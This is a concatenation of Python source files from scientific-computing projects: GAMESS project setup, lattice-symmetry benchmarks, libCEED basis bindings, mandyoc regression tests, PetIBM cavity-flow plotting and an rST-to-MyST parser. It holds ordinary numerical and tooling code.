c, rms = scaling_factor_scott(theo, expt)
#apply to columns in sliced DataFrame
df.loc[i] = j.apply(lambda x: str(x) + '(' + str(round(float(x)*c, 2)) + ')')
#Added column giving Scaling Factor and RMS
df2.loc[i,'Scaling Factor/RMS'] = str(c) + '/' + str(rms)
#update main DataFrame
df2.update(df)
#write Excel spreadsheet with updated DataFrame
book = load_workbook(sheetsdir + specie + xlsx)
with pd.ExcelWriter(sheetsdir + specie + xlsx, engine='openpyxl') as writer:
writer.book = book
writer.sheets = dict((ws.title, ws) for ws in book.worksheets)
df2.to_excel(writer, sheet_name=hes, startrow=6)
return
```
#### File: autogamess/autogamess/new_project.py
```python
import pkg_resources
from .config import *
from .input_builder import input_builder
def new_project(maindir, csvfile, initial_coords_dict=None,
title='Project_Name/', make_inputs=False):
"""
This function creates a new directory tree for a GAMESS project, also makes
a couple of text files for use with other functions.
Parameters
----------
maindir: string
A directory string (including the final `/`) that points to the
directory that the project tree will be spawned in.
csvfile: string
A directory string (including the final `.csv`) that points to the
text file containing project information. Read module documentation
for csv file format.
initial_coords_dict: dictionary [Optional]
This should be a dictionary with the key being the specie and the
value being a list that of its inital coordinates.
title: string [Optional]
A directory string (including the final `/`) that will be used as
the head of project directory tree.
make_inputs: boolean True/False [Optional]
if True then new_project will call input_builder at the end.
Notes 1
----------
If the molecules you wish to build are not already defined in the
general autogamess coordinate dictionary, then initial_coords_dict
must be passed.
To see the autogamess coordianate dictionary simply print out
>>> ag.dictionaries.molecule_dictionary
Returns
----------
This function returns nothing
Notes 2
----------
The format of the spawned directory tree is as follows:
maindir
|
title
-------------------------------------
| | | | |
Codes Inps Logs Batch_Files Spreadsheets
| | | |
--------- Block ----------- 1 file per specie
| | | | |
Text_Files Scripts Fail Pass Sorted
| | |
------- Block 1 directory per specie
| |
Unsolved Solved
Sections in directory tree labled 'Block' are directory trees with the
following format:
1 directory per run type
|
1 directory per specie
Examples
----------
>>> import autogamess as ag
>>>
>>> csvfile = './input.csv'
>>> maindir = './'
>>> title = 'Project Title/'
>>>
>>> ag.new_project(maindir, csvfile, title=title)
>>>
"""
#Spreadsheet header phrase
version = (' AutoGAMESS Version ' +
str(pkg_resources.require("autogamess")[0].version) )
author = ' by <NAME>'
#Defining directory names
unsolved = maindir + title + 'Logs/Fail/Unsolved/'
solved = maindir + title + 'Logs/Fail/Solved/'
xldir = maindir + title + 'Spreadsheets/'
inputs = maindir + title + 'Inps/'
goodlogs = maindir + title + 'Logs/Pass/'
sorrted = maindir + title + 'Logs/Sorted/'
#Define random commands
fin = '\nBREAK\n'
engine = 'xlsxwriter'
xlsx = '.xlsx'
#Make directories
try:
os.makedirs(unsolved)
os.makedirs(solved)
os.makedirs(xldir)
except:
sys.exit("Project Directory or sub-directories already exist")
#Read in csv file or Pandas DataFrame
df = check_data_type(csvfile)
#Make lists of species, run-types, basis_sets, theories
runtyps = [str(x) + '/' for x in list(df['Run Types'].dropna())]
species = [str(x) + '/' for x in list(df['Species'].dropna())]
theories = list(df['Theory'].dropna())
basis_sets = list(df['Basis Sets'].dropna()) + list(
df['External Basis Sets'].dropna())
#Make Block directory trees
for runtyp in runtyps:
for specie in species:
os.makedirs(inputs+runtyp+specie)
os.makedirs(goodlogs+runtyp+specie)
#Make data for Spreadsheets
theo = []
for theory in theories:
temp = [theory]*len(basis_sets)
theo += temp + ['\n', '\n','\n']
bs = (basis_sets + ['\n', '\n','\n']) *len(theories)
#Make dataframe with basis sets names only
data = {'Theory': theo, 'Basis Set': bs}
df2 = pd.DataFrame(data=data)
#More directory making and Excell workbook and sheet making
for specie in species:
os.makedirs(sorrted+specie)
#Define header for Spreadsheets
header = [version, author, '',
'Project Name : ' + title.replace('/', ''),
'Molecule Name: ' + specie.replace('/', '')]
#Define Excell filename
xlfilename = xldir + specie.replace('/', xlsx)
#Initialize writer
writer = pd.ExcelWriter(xlfilename, engine=engine)
#Make Sheets and put headers on them all
for runtyp in runtyps:
#Define sheet name and make it
sheet = runtyp.replace('/', '')
df2.to_excel(writer, startrow=6, startcol=0, sheet_name=sheet)
worksheet = writer.sheets[sheet]
#Write Header
for line in header:
i = header.index(line)
worksheet.write(i, 0, line)
#Save Excell file
writer.save()
#Run Input Builder function
if make_inputs is True:
save_dir = inputs
input_builder(csvfile, save_dir, initial_coords_dict,
proj_title = title.replace('/', '\n'))
return
```
|
{
"source": "jedbrown/lattice-symmetries",
"score": 2
}
|
#### File: lattice-symmetries/benchmark/systems.py
```python
import sys
import os
import time
from loguru import logger
import numpy as np
try:
import lattice_symmetries as ls
except ImportError:
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), "..", "python"))
import lattice_symmetries as ls
def get_processor_name():
import subprocess
import json
result = subprocess.run(["lscpu", "-J"], check=False, capture_output=True)
if result.returncode != 0:
logger.warn(
"Failed to get processor name: {} returned error code {}: {}",
result.args,
result.returncode,
result.stderr,
)
return None
for obj in json.loads(result.stdout)["lscpu"]:
if obj["field"].startswith("Model name"):
return obj["data"]
def square_lattice_symmetries(L_x, L_y, sectors=dict()):
assert L_x > 0 and L_y > 0
sites = np.arange(L_y * L_x, dtype=np.int32)
x = sites % L_x
y = sites // L_x
symmetries = []
if L_x > 1:
T_x = (x + 1) % L_x + L_x * y # translation along x-direction
symmetries.append(("T_x", T_x, sectors.get("T_x", 0)))
P_x = (L_x - 1 - x) + L_x * y # reflection over y-axis
symmetries.append(("P_x", P_x, sectors.get("P_x", 0)))
if L_y > 1:
T_y = x + L_x * ((y + 1) % L_y) # translation along y-direction
symmetries.append(("T_y", T_y, sectors.get("T_y", 0)))
P_y = x + L_x * (L_y - 1 - y) # reflection around x-axis
symmetries.append(("P_y", P_y, sectors.get("P_y", 0)))
if L_x == L_y and L_x > 1: # Rotations are valid only for square samples
R = np.rot90(sites.reshape(L_y, L_x), k=-1).reshape(-1)
symmetries.append(("R", R, sectors.get("R", 0)))
if L_x * L_y % 2 == 0:
symmetries.append(("I", None, sectors.get("I", 0)))
return symmetries
def square_lattice_edges(L_x, L_y):
assert L_x > 0 and L_y > 0
# Example 4x6 square to illustrate the ordering of sites:
# [[ 0, 1, 2, 3, 4, 5],
# [ 6, 7, 8, 9, 10, 11],
# [12, 13, 14, 15, 16, 17],
# [18, 19, 20, 21, 22, 23]])
sites = np.arange(L_y * L_x, dtype=np.int32).reshape(L_y, L_x)
def generate_nearest_neighbours():
for y in range(L_y):
for x in range(L_x):
if L_x > 1:
yield (sites[y, x], sites[y, (x + 1) % L_x])
if L_y > 1:
yield (sites[y, x], sites[(y + 1) % L_y, x])
def generate_next_nearest_neighbours():
if L_x == 1 or L_y == 1:
return
for y in range(L_y):
for x in range(L_x):
yield (sites[y, x], sites[(y + 1) % L_y, (x + L_x - 1) % L_x])
yield (sites[y, x], sites[(y + 1) % L_y, (x + 1) % L_x])
return list(generate_nearest_neighbours()), list(generate_next_nearest_neighbours())
def _quspin_make_basis(symmetries, number_spins, hamming_weight=None, build=True, **kwargs):
import quspin.basis
def transform(t):
x0, x1, x2 = t
if x1 is None:
return (x0, (-(np.arange(number_spins, dtype=np.int32) + 1), x2))
return x0, (x1, x2)
basis = quspin.basis.spin_basis_general(
N=number_spins,
Nup=hamming_weight,
make_basis=build,
**kwargs,
**dict(transform(s) for s in symmetries)
)
return basis
def _ls_make_basis(symmetries, number_spins, hamming_weight=None, build=True):
spin_inversion = None
processed_symmetries = []
for s in symmetries:
_, x1, x2 = s
if x1 is None:
assert x2 == 0 or x2 == 1
spin_inversion = 1 if x2 == 0 else -1
else:
processed_symmetries.append(ls.Symmetry(x1, sector=x2))
group = ls.Group(processed_symmetries)
logger.info("Symmetry group contains {} elements", len(group))
basis = ls.SpinBasis(
group,
number_spins=number_spins,
hamming_weight=hamming_weight,
spin_inversion=spin_inversion,
)
if build:
basis.build()
return basis
def make_basis(*args, backend="ls", **kwargs):
if backend == "ls":
return _ls_make_basis(*args, **kwargs)
elif backend == "quspin":
return _quspin_make_basis(*args, **kwargs)
else:
raise ValueError("invalid backend: {}; expected either 'ls' or 'quspin'".format(backend))
def _quspin_make_heisenberg(basis, nearest, next_nearest=None, j2=None, dtype=np.float64, matrix=False):
from quspin.operators import quantum_LinearOperator, hamiltonian
static = [
["+-", [[0.5, i, j] for (i, j) in nearest]],
["-+", [[0.5, i, j] for (i, j) in nearest]],
["zz", [[1.0, i, j] for (i, j) in nearest]],
]
if next_nearest is not None:
assert j2 is not None
static += [
["+-", [[0.5 * j2, i, j] for (i, j) in next_nearest]],
["-+", [[0.5 * j2, i, j] for (i, j) in next_nearest]],
["zz", [[1.0 * j2, i, j] for (i, j) in next_nearest]],
]
if matrix:
return hamiltonian(static, [], basis=basis, dtype=dtype)
return quantum_LinearOperator(static, basis=basis, dtype=dtype)
def _ls_make_heisenberg(basis, nearest, next_nearest=None, j2=None, dtype=None):
matrix = [[1, 0, 0, 0], [0, -1, 2, 0], [0, 2, -1, 0], [0, 0, 0, 1]]
interactions = [ls.Interaction(matrix, nearest)]
if next_nearest is not None:
assert j2 is not None
interactions.append(ls.Interaction(j2 * matrix, next_nearest))
return ls.Operator(basis, interactions)
def make_heisenberg(*args, backend="ls", **kwargs):
if backend == "ls":
return _ls_make_heisenberg(*args, **kwargs)
elif backend == "quspin":
return _quspin_make_heisenberg(*args, **kwargs)
else:
raise ValueError("invalid backend: {}; expected either 'ls' or 'quspin'".format(backend))
```
#### File: lattice-symmetries/profile/main.py
```python
import time
import sys
import os
import timeit
import subprocess
from loguru import logger
import numpy as np
import lattice_symmetries as ls
def make_basis(L_x, L_y, sectors=dict()):
assert L_x > 0 and L_y > 0
sites = np.arange(L_y * L_x, dtype=np.int32)
x = sites % L_x
y = sites // L_x
symmetries = []
if L_x > 1:
T_x = (x + 1) % L_x + L_x * y # translation along x-direction
symmetries.append(("T_x", T_x, sectors.get("T_x", 0)))
P_x = (L_x - 1 - x) + L_x * y # reflection over y-axis
symmetries.append(("P_x", P_x, sectors.get("P_x", 0)))
if L_y > 1:
T_y = x + L_x * ((y + 1) % L_y) # translation along y-direction
symmetries.append(("T_y", T_y, sectors.get("T_y", 0)))
P_y = x + L_x * (L_y - 1 - y) # reflection around x-axis
symmetries.append(("P_y", P_y, sectors.get("P_y", 0)))
if L_x == L_y and L_x > 1: # Rotations are valid only for square samples
R = np.rot90(sites.reshape(L_y, L_x), k=-1).reshape(-1)
symmetries.append(("R", R, sectors.get("R", 0)))
if L_x * L_y % 2 == 0:
symmetries.append(("I", None, sectors.get("I", 0)))
hamming_weight = (L_x * L_y) // 2
spin_inversion = None
processed_symmetries = []
for s in symmetries:
_, x1, x2 = s
if x1 is None:
assert x2 == 0 or x2 == 1
spin_inversion = 1 if x2 == 0 else -1
else:
processed_symmetries.append(ls.Symmetry(x1, sector=x2))
group = ls.Group(processed_symmetries)
basis = ls.SpinBasis(
group,
number_spins=L_x * L_y,
hamming_weight=hamming_weight,
spin_inversion=spin_inversion,
)
basis.build()
return basis
def make_operator(L_x, L_y, basis):
assert L_x > 0 and L_y > 0
sites = np.arange(L_y * L_x, dtype=np.int32).reshape(L_y, L_x)
def generate_nearest_neighbours():
for y in range(L_y):
for x in range(L_x):
if L_x > 1:
yield (sites[y, x], sites[y, (x + 1) % L_x])
if L_y > 1:
yield (sites[y, x], sites[(y + 1) % L_y, x])
def generate_next_nearest_neighbours():
if L_x == 1 or L_y == 1:
return
for y in range(L_y):
for x in range(L_x):
yield (sites[y, x], sites[(y + 1) % L_y, (x + L_x - 1) % L_x])
yield (sites[y, x], sites[(y + 1) % L_y, (x + 1) % L_x])
edges = list(generate_nearest_neighbours())
matrix = np.array(
[[1, 0, 0, 0], [0, -1, 2, 0], [0, 2, -1, 0], [0, 0, 0, 1]], dtype=np.complex128
)
operator = ls.Operator(basis, [ls.Interaction(matrix, edges)])
return operator
def do_benchmark(L_x, L_y):
basis = make_basis(L_x, L_y)
operator = make_operator(L_x, L_y, basis)
block_size = 1
n = basis.number_states
x = 0.5 - np.random.rand(n, block_size)
x = np.asfortranarray(x)
tick = time.time()
for _ in range(10):
x = operator(x)
tock = time.time()
print(tock - tick)
def main():
do_benchmark(6, 4)
if __name__ == "__main__":
main()
```
|
{
"source": "jedbrown/libCEED",
"score": 2
}
|
#### File: libCEED/python/ceed_basis.py
```python
from _ceed_cffi import ffi, lib
import tempfile
import numpy as np
from abc import ABC
from .ceed_constants import TRANSPOSE, NOTRANSPOSE
# ------------------------------------------------------------------------------
class Basis(ABC):
"""Ceed Basis: finite element basis objects."""
# Representation
def __repr__(self):
return "<CeedBasis instance at " + hex(id(self)) + ">"
# String conversion for print() to stdout
def __str__(self):
"""View a Basis via print()."""
# libCEED call
with tempfile.NamedTemporaryFile() as key_file:
with open(key_file.name, 'r+') as stream_file:
stream = ffi.cast("FILE *", stream_file)
err_code = lib.CeedBasisView(self._pointer[0], stream)
self._ceed._check_error(err_code)
stream_file.seek(0)
out_string = stream_file.read()
return out_string
# Apply Basis
def apply(self, nelem, emode, u, v, tmode=NOTRANSPOSE):
"""Apply basis evaluation from nodes to quadrature points or vice versa.
Args:
nelem: the number of elements to apply the basis evaluation to;
the backend will specify the ordering in a
BlockedElemRestriction
emode: basis evaluation mode
u: input vector
v: output vector
**tmode: CEED_NOTRANSPOSE to evaluate from nodes to quadrature
points, CEED_TRANSPOSE to apply the transpose, mapping
from quadrature points to nodes; default CEED_NOTRANSPOSE"""
# libCEED call
err_code = lib.CeedBasisApply(self._pointer[0], nelem, tmode, emode,
u._pointer[0], v._pointer[0])
self._ceed._check_error(err_code)
# Transpose a Basis
@property
def T(self):
"""Transpose a Basis."""
return TransposeBasis(self)
# Transpose a Basis
@property
def transpose(self):
"""Transpose a Basis."""
return TransposeBasis(self)
# Get number of nodes
def get_num_nodes(self):
"""Get total number of nodes (in dim dimensions) of a Basis.
Returns:
num_nodes: total number of nodes"""
# Setup argument
p_pointer = ffi.new("CeedInt *")
# libCEED call
err_code = lib.CeedBasisGetNumNodes(self._pointer[0], p_pointer)
self._ceed._check_error(err_code)
return p_pointer[0]
# Get number of quadrature points
def get_num_quadrature_points(self):
"""Get total number of quadrature points (in dim dimensions) of a Basis.
Returns:
num_qpts: total number of quadrature points"""
# Setup argument
q_pointer = ffi.new("CeedInt *")
# libCEED call
err_code = lib.CeedBasisGetNumQuadraturePoints(
self._pointer[0], q_pointer)
self._ceed._check_error(err_code)
return q_pointer[0]
# Destructor
def __del__(self):
# libCEED call
err_code = lib.CeedBasisDestroy(self._pointer)
self._ceed._check_error(err_code)
# ------------------------------------------------------------------------------
class BasisTensorH1(Basis):
"""Ceed Tensor H1 Basis: finite element tensor-product basis objects for
H^1 discretizations."""
# Constructor
def __init__(self, ceed, dim, ncomp, P1d, Q1d, interp1d, grad1d,
qref1d, qweight1d):
# Setup arguments
self._pointer = ffi.new("CeedBasis *")
self._ceed = ceed
interp1d_pointer = ffi.new("CeedScalar *")
interp1d_pointer = ffi.cast(
"CeedScalar *",
interp1d.__array_interface__['data'][0])
grad1d_pointer = ffi.new("CeedScalar *")
grad1d_pointer = ffi.cast(
"CeedScalar *",
grad1d.__array_interface__['data'][0])
qref1d_pointer = ffi.new("CeedScalar *")
qref1d_pointer = ffi.cast(
"CeedScalar *",
qref1d.__array_interface__['data'][0])
qweight1d_pointer = ffi.new("CeedScalar *")
qweight1d_pointer = ffi.cast(
"CeedScalar *",
qweight1d.__array_interface__['data'][0])
# libCEED call
err_code = lib.CeedBasisCreateTensorH1(self._ceed._pointer[0], dim, ncomp,
P1d, Q1d, interp1d_pointer,
grad1d_pointer, qref1d_pointer,
qweight1d_pointer, self._pointer)
self._ceed._check_error(err_code)
# Get 1D interpolation matrix
def get_interp_1d(self):
"""Return 1D interpolation matrix of a tensor product Basis.
Returns:
*array: Numpy array"""
# Compute the length of the array
nnodes_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumNodes1D(self._pointer[0], nnodes_pointer)
nqpts_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumQuadraturePoints1D(self._pointer[0], nqpts_pointer)
length = nnodes_pointer[0] * nqpts_pointer[0]
# Setup the pointer's pointer
array_pointer = ffi.new("CeedScalar **")
# libCEED call
lib.CeedBasisGetInterp1D(self._pointer[0], array_pointer)
# Return array created from buffer
# Create buffer object from returned pointer
buff = ffi.buffer(
array_pointer[0],
ffi.sizeof("CeedScalar") *
length)
# return read only Numpy array
ret = np.frombuffer(buff, dtype="float64")
ret.flags['WRITEABLE'] = False
return ret
# Get 1D gradient matrix
def get_grad_1d(self):
"""Return 1D gradient matrix of a tensor product Basis.
Returns:
*array: Numpy array"""
# Compute the length of the array
nnodes_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumNodes1D(self._pointer[0], nnodes_pointer)
nqpts_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumQuadraturePoints1D(self._pointer[0], nqpts_pointer)
length = nnodes_pointer[0] * nqpts_pointer[0]
# Setup the pointer's pointer
array_pointer = ffi.new("CeedScalar **")
# libCEED call
lib.CeedBasisGetGrad1D(self._pointer[0], array_pointer)
# Return array created from buffer
# Create buffer object from returned pointer
buff = ffi.buffer(
array_pointer[0],
ffi.sizeof("CeedScalar") *
length)
# return read only Numpy array
ret = np.frombuffer(buff, dtype="float64")
ret.flags['WRITEABLE'] = False
return ret
# Get 1D quadrature weights matrix
def get_q_weight_1d(self):
"""Return 1D quadrature weights matrix of a tensor product Basis.
Returns:
*array: Numpy array"""
# Compute the length of the array
nqpts_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumQuadraturePoints1D(self._pointer[0], nqpts_pointer)
length = nqpts_pointer[0]
# Setup the pointer's pointer
array_pointer = ffi.new("CeedScalar **")
# libCEED call
lib.CeedBasisGetQWeights(self._pointer[0], array_pointer)
# Return array created from buffer
# Create buffer object from returned pointer
buff = ffi.buffer(
array_pointer[0],
ffi.sizeof("CeedScalar") *
length)
# return read only Numpy array
ret = np.frombuffer(buff, dtype="float64")
ret.flags['WRITEABLE'] = False
return ret
# Get 1D quadrature points matrix
def get_q_ref_1d(self):
"""Return 1D quadrature points matrix of a tensor product Basis.
Returns:
*array: Numpy array"""
# Compute the length of the array
nqpts_pointer = ffi.new("CeedInt *")
lib.CeedBasisGetNumQuadraturePoints1D(self._pointer[0], nqpts_pointer)
length = nqpts_pointer[0]
# Setup the pointer's pointer
array_pointer = ffi.new("CeedScalar **")
# libCEED call
lib.CeedBasisGetQRef(self._pointer[0], array_pointer)
# Return array created from buffer
# Create buffer object from returned pointer
buff = ffi.buffer(
array_pointer[0],
ffi.sizeof("CeedScalar") *
length)
# return read only Numpy array
ret = np.frombuffer(buff, dtype="float64")
ret.flags['WRITEABLE'] = False
return ret
# ------------------------------------------------------------------------------
class BasisTensorH1Lagrange(BasisTensorH1):
"""Ceed Tensor H1 Lagrange Basis: finite element tensor-product Lagrange basis
objects for H^1 discretizations."""
# Constructor
def __init__(self, ceed, dim, ncomp, P, Q, qmode):
# Setup arguments
self._pointer = ffi.new("CeedBasis *")
self._ceed = ceed
# libCEED call
err_code = lib.CeedBasisCreateTensorH1Lagrange(self._ceed._pointer[0], dim,
ncomp, P, Q, qmode, self._pointer)
self._ceed._check_error(err_code)
# ------------------------------------------------------------------------------
class BasisH1(Basis):
"""Ceed H1 Basis: finite element non tensor-product basis for H^1 discretizations."""
# Constructor
def __init__(self, ceed, topo, ncomp, nnodes,
nqpts, interp, grad, qref, qweight):
# Setup arguments
self._pointer = ffi.new("CeedBasis *")
self._ceed = ceed
interp_pointer = ffi.new("CeedScalar *")
interp_pointer = ffi.cast(
"CeedScalar *",
interp.__array_interface__['data'][0])
grad_pointer = ffi.new("CeedScalar *")
grad_pointer = ffi.cast(
"CeedScalar *",
grad.__array_interface__['data'][0])
qref_pointer = ffi.new("CeedScalar *")
qref_pointer = ffi.cast(
"CeedScalar *",
qref.__array_interface__['data'][0])
qweight_pointer = ffi.new("CeedScalar *")
qweight_pointer = ffi.cast(
"CeedScalar *",
qweight.__array_interface__['data'][0])
# libCEED call
err_code = lib.CeedBasisCreateH1(self._ceed._pointer[0], topo, ncomp,
nnodes, nqpts, interp_pointer,
grad_pointer, qref_pointer,
qweight_pointer, self._pointer)
# ------------------------------------------------------------------------------
class TransposeBasis():
"""Transpose Ceed Basis: transpose of finite element tensor-product basis objects."""
# Attributes
_basis = None
# Constructor
def __init__(self, basis):
# Reference basis
self._basis = basis
# Representation
def __repr__(self):
return "<Transpose CeedBasis instance at " + hex(id(self)) + ">"
# Apply Transpose Basis
def apply(self, nelem, emode, u, v):
"""Apply basis evaluation from quadrature points to nodes.
Args:
nelem: the number of elements to apply the basis evaluation to;
the backend will specify the ordering in a
Blocked ElemRestriction
**emode: basis evaluation mode
u: input vector
v: output vector"""
# libCEED call
self._basis.apply(nelem, emode, u, v, tmode=TRANSPOSE)
# ------------------------------------------------------------------------------
```
|
{
"source": "jedbrown/mandyoc",
"score": 2
}
|
#### File: mandyoc/tests/testing_results.py
```python
import os
import pytest
import numpy as np
import numpy.testing as npt
from pathlib import Path
# Test path
base_path = Path(os.path.realpath(os.path.abspath(__file__))).parent
scenarios = [
"vanKeken1997_case1a",
"Crameri2012_case2",
"continental_rift",
]
# Name of the files to compare
fields = [
"time",
"density",
"heat",
"pressure",
"strain",
"strain_rate",
"sp_surface_global",
"temperature",
"velocity",
"viscosity",
"step_0",
"step_1",
]
# steps to compare
steps = [0, 1]
def read(filename):
"""
Read the file
"""
if "time" not in filename.name:
args = dict(unpack=True, comments="P", skiprows=2)
else:
args = dict(unpack=True, delimiter=":", usecols=1)
data = np.loadtxt(filename, **args)
return data
@pytest.mark.parametrize("step", steps)
@pytest.mark.parametrize("field", fields)
@pytest.mark.parametrize("scenario", scenarios)
def test_result(scenario, field, step):
"""Run tests"""
if scenario != 'Crameri2012_case2' and field == 'sp_surface_global':
pytest.skip('No sp_surface_global for this scenario')
if scenario == 'Crameri2012_case2' and step == 1:
pytest.skip('Tested with only one processor')
test_path = base_path / "data" / scenario/ "output"
expected_path = base_path / "data" / scenario/ "expected"
filename = f"{field}_{step}" + ".txt"
output = read(test_path / filename)
expected = read(expected_path / filename)
npt.assert_allclose(output, expected, rtol=2e-4, atol=1.0e-18)
```
|
{
"source": "jedbrown/PetIBM",
"score": 3
}
|
#### File: liddrivencavity2dRe3200/scripts/plotCenterlineVelocities.py
```python
import os
import numpy
import h5py
from matplotlib import pyplot
# User's parameters
Re = 3200.0 # Reynolds number
time_step = 25000 # Time step at which to read the solution
# End of user's parameters
if not os.environ.get('PETIBM_EXAMPLES'):
raise KeyError('Environment variable PETIBM_EXAMPLES is not set; '
'Set PETIBM_EXAMPLES as the root directory of the examples.')
script_dir = os.path.dirname(os.path.realpath(__file__))
simu_dir = os.sep.join(script_dir.split(os.sep)[:-1])
root_dir = os.environ['PETIBM_EXAMPLES']
def get_gridline_velocity(x_target, u, x, axis=0):
i = numpy.where(x < x_target)[0][-1]
x_a, x_b = x[i], x[i + 1]
if axis == 0:
u_a, u_b = u[:, i], u[:, i + 1]
elif axis == 1:
u_a, u_b = u[i], u[i + 1]
return (u_a * (x_b - x_target) + u_b * (x_target - x_a)) / (x_b - x_a)
def read_data_ghia_et_al_1982(filepath, Re):
with open(filepath, 'r') as infile:
data = numpy.loadtxt(infile, dtype=numpy.float64, unpack=True)
re2col = {100.0: (1, 7), 1000.0: (2, 8), 3200.0: (3, 9), 5000.0: (4, 10),
10000.0: (5, 11)}
return {'vertical': {'y': data[0], 'u': data[re2col[Re][0]]},
'horizontal': {'x': data[6], 'v': data[re2col[Re][1]]}}
def read_field_hdf5(name, fieldpath, gridpath):
field = {}
f = h5py.File(gridpath, 'r')
field['x'], field['y'] = f[name]['x'][:], f[name]['y'][:]
f = h5py.File(fieldpath, 'r')
field['values'] = f[name][:]
return field
# Reads data from Ghia et al. (1982).
filepath = os.path.join(root_dir, 'data',
'ghia_et_al_1982_lid_driven_cavity.dat')
ghia = read_data_ghia_et_al_1982(filepath, Re)
# Reads gridlines and velocity fields.
gridpath = os.path.join(simu_dir, 'grid.h5')
filepath = os.path.join(simu_dir, 'solution', '{:0>7}.h5'.format(time_step))
u = read_field_hdf5('u', filepath, gridpath)
v = read_field_hdf5('v', filepath, gridpath)
# Computes x-velocity along vertical gridline at mid-cavity.
x_target = 0.5
u['vertical'] = get_gridline_velocity(x_target, u['values'], u['x'], axis=0)
# Computes y-velocity along horizontal gridline at mid-cavity.
y_target = 0.5
v['horizontal'] = get_gridline_velocity(y_target, v['values'], v['y'], axis=1)
# Plots the centerline velocities.
pyplot.style.use('seaborn-dark')
simu_kwargs = {'label': 'PetIBM',
'color': '#336699', 'linestyle': '-', 'linewidth': 3,
'zorder': 10}
ghia_kwargs = {'label': 'Ghia et al. (1982)',
'color': '#993333', 'linewidth': 0,
'markeredgewidth': 2, 'markeredgecolor': '#993333',
'markerfacecolor': 'none',
'marker': 'o', 'markersize': 8,
'zorder': 10}
fig, ax = pyplot.subplots(2, figsize=(8, 8))
fig.suptitle('Re = {}'.format(int(Re)), fontname='DejaVu Serif', fontsize=16)
ax[0].grid(True, zorder=0)
ax[0].set_xlabel('y', fontname='DejaVu Serif', fontsize=16)
ax[0].set_ylabel('u (x={})'.format(x_target),
fontname='DejaVu Serif', fontsize=16)
ax[0].plot(u['y'], u['vertical'], **simu_kwargs)
ax[0].plot(ghia['vertical']['y'], ghia['vertical']['u'], **ghia_kwargs)
ax[0].axis([0.0, 1.0, -0.75, 1.25])
ax[0].legend(loc='upper left', prop={'size': 14})
ax[1].grid(True, zorder=0)
ax[1].set_xlabel('x', fontname='DejaVu Serif', fontsize=16)
ax[1].set_ylabel('v (y={})'.format(y_target),
fontname='DejaVu Serif', fontsize=16)
ax[1].plot(v['x'], v['horizontal'], **simu_kwargs)
ax[1].plot(ghia['horizontal']['x'], ghia['horizontal']['v'], **ghia_kwargs)
ax[1].axis([0.0, 1.0, -0.75, 1.25])
ax[1].legend(loc='upper left', prop={'size': 14})
for a in ax:
for method in ['get_xticklabels', 'get_yticklabels']:
for label in getattr(a, method)():
label.set_fontname('DejaVu Serif')
label.set_fontsize(14)
# Saves figure
figures_dir = os.path.join(simu_dir, 'figures')
if not os.path.isdir(figures_dir):
os.makedirs(figures_dir)
filename = 'centerlineVelocities{:0>7}.png'.format(time_step)
filepath = os.path.join(figures_dir, filename)
fig.savefig(filepath)
```
|
{
"source": "jedbrown/rst-to-myst",
"score": 3
}
|
#### File: rst-to-myst/rst_to_myst/nodes.py
```python
from typing import Any, List, Tuple
from docutils import nodes
class UnprocessedText(nodes.Text):
"""Text that should not be processed in any way (e.g. escaping characters)."""
class EvalRstNode(nodes.Element):
"""Should contain a single ``Text`` node with the contents to wrap."""
class RoleNode(nodes.Element):
pass
class DirectiveNode(nodes.Element):
"""This node will have an optional ``ArgumentNode`` and/or ``ContentNode`` child."""
def __init__(
self,
rawsource,
*,
name: str,
module: str,
conversion: str,
options_list: List[Tuple[str, Any]],
**kwargs
) -> None:
super().__init__(
rawsource,
name=name,
module=module,
conversion=conversion,
options_list=options_list,
**kwargs
)
class ArgumentNode(nodes.Element):
"""The parsed argument of a directive."""
class ContentNode(nodes.Element):
"""The parsed content of a directive."""
class FrontMatterNode(nodes.Element):
"""Contains the first field list in the document."""
```
#### File: rst-to-myst/rst_to_myst/parser.py
```python
from io import StringIO
from typing import Tuple
import yaml
from docutils import nodes
from docutils.frontend import OptionParser
from docutils.parsers.rst import Parser
from docutils.transforms import Transform
from docutils.transforms.references import (
AnonymousHyperlinks,
Footnotes,
PropagateTargets,
)
from docutils.utils import new_document, roman
try:
from importlib.resources import files
except ImportError:
from importlib_resources import files
from . import data as package_data
from .inliner import InlinerMyst
from .namespace import compile_namespace
from .nodes import FrontMatterNode
from .states import get_state_classes
class LosslessRSTParser(Parser):
"""Modified RST Parser, allowing for the retrieval of the original source text.
Principally, roles and directives are not run.
"""
def __init__(self):
self.initial_state = "Body"
self.state_classes = get_state_classes()
for state_class in self.state_classes:
# flush any cached states from the last parse
state_class.nested_sm_cache = []
self.inliner = InlinerMyst()
class IndirectHyperlinks(Transform):
"""Resolve indirect hyperlinks."""
def apply(self):
for target in self.document.indirect_targets:
if not target.resolved:
self.resolve_indirect_target(target) # TODO implement this resolve?
# Do not resolve the actual references, since this replaces the "refname"
# self.resolve_indirect_references(target)
class StripFootnoteLabel(Transform):
"""Footnotes and citations can start with a label note, which we do not need."""
def apply(self):
for node in self.document.traverse(
lambda n: isinstance(n, (nodes.footnote, nodes.citation))
):
if node.children and isinstance(node.children[0], nodes.label):
node.pop(0)
ENUM_CONVERTERS = {
"arabic": (lambda i: i),
"lowerroman": (lambda i: roman.toRoman(i).lower()),
"upperroman": (lambda i: roman.toRoman(i).upper()),
"loweralpha": (lambda i: chr(ord("a") + i - 1)),
"upperalpha": (lambda i: chr(ord("a") + i - 1).upper()),
}
class ResolveListItems(Transform):
"""For bullet/enumerated lists, propagate attributes to their child list items.
Also decide if they are loose/tight::
A list is loose if any of its list items are separated by blank lines,
or if any of its list items directly contain two block-level elements
with a blank line between them. Otherwise a list is tight.
"""
def apply(self):
for node in self.document.traverse(nodes.bullet_list):
prefix = node["bullet"] + " "
for child in node.children:
if isinstance(child, nodes.list_item):
child["style"] = "bullet"
child["prefix"] = prefix
for node in self.document.traverse(nodes.enumerated_list):
number = 1
if "start" in node:
number = node["start"]
# TODO markdown-it only supports numbers
# prefix = node["prefix"]
# suffix = node["suffix"]
# convert = ENUM_CONVERTERS[node["enumtype"]]
for child in node.children:
if isinstance(child, nodes.list_item):
child["style"] = "enumerated"
child["prefix"] = f"{number}. "
number += 1
class FrontMatter(Transform):
"""Extract an initial field list into a `FrontMatterNode`.
